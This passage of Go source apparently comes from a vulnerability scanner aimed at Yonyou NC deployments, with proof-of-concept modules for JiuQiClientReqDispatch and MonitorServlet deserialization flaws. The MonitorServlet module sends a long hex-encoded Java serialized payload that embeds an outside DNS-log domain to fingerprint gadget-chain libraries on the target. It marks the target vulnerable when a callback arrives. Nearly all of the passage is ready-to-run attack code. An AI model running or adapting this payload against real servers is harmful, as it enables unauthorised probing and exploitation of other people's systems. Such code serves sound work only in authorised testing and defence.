hex.EncodeToString([]byte(domain)))))).Post(url) 29 | if err != nil { 30 | color.Red.Println("[-] 用友 NC JiuQiClientReqDispatch反序列化漏洞不存在") 31 | return 32 | } 33 | if dnslog.GetDnslogRecord(session) { 34 | color.Green.Println("[+] 用友 NC JiuQiClientReqDispatch反序列化漏洞存在 -> 
" + url) 35 | return 36 | } 37 | color.Red.Println("[-] 用友 NC JiuQiClientReqDispatch反序列化漏洞不存在") 38 | } 39 | -------------------------------------------------------------------------------- /pkg/POC/monitorservlet-Desera/monitorservlet-Desera.go: -------------------------------------------------------------------------------- 1 | package monitorservlet_Desera 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url1 := url + "service/monitorservlet" 21 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Content-Length": "20434", 24 | "Content-Type": "application/x-www-form-urlencoded", 25 | }).Post(url1) 26 | if err != nil { 27 | } else { 28 | if resp.Status == "200 OK" { 29 | color.Green.Println("[+] 用友 NC MonitorServlet反序列化漏洞存在 -> " + url) 30 | return 31 | } 32 | } 33 | url2 := url + "servlet/~ic/nc.bs.framework.mx.monitor.MonitorServlet" 34 | _, err1 := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 35 | "User-Agent": UA, 36 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url2) 37 | if err1 != nil { 38 | color.Red.Println("[-] 用友 NC MonitorServlet反序列化漏洞不存在") 39 | return 40 | } 41 | if dnslog.GetDnslogRecord(session) { 42 | color.Green.Println("[+] 用友 NC MonitorServlet反序列化漏洞存在 -> " + url) 43 | 
return 44 | } 45 | color.Red.Println("[-] 用友 NC MonitorServlet反序列化漏洞不存在") 46 | } 47 | --------------------------------------------------------------------------------